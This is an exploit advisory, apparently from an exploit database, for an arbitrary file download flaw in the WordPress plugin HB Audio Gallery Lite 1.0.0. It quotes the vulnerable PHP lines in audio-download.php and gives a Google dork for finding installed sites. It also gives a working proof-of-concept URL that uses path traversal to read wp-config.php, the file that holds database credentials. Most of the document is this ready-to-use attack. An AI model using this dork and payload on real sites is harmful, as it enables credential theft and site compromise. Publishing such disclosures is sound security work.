22 lines
No EOL
808 B
Text
22 lines
No EOL
808 B
Text
# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
|
|
# Exploit Author: CrashBandicot
|
|
# Date: 2016-03-22
|
|
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
|
|
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
|
|
# Tested on: MSWin32
|
|
# Version: 1.0.0
|
|
|
|
# Vuln file : gallery/audio-download.php
|
|
|
|
11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
|
|
13. $file_size = $_REQUEST['file_size'];
|
|
15. $file = $_REQUEST['file_path'];
|
|
17. $filename = basename($file);
|
|
....
|
|
55. Header("Content-Disposition: attachment; filename='" . $filename . "'");
|
|
|
|
|
|
# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
|
|
|
|
|
|
# 22/03/2016 - Informed Vendor about Issue |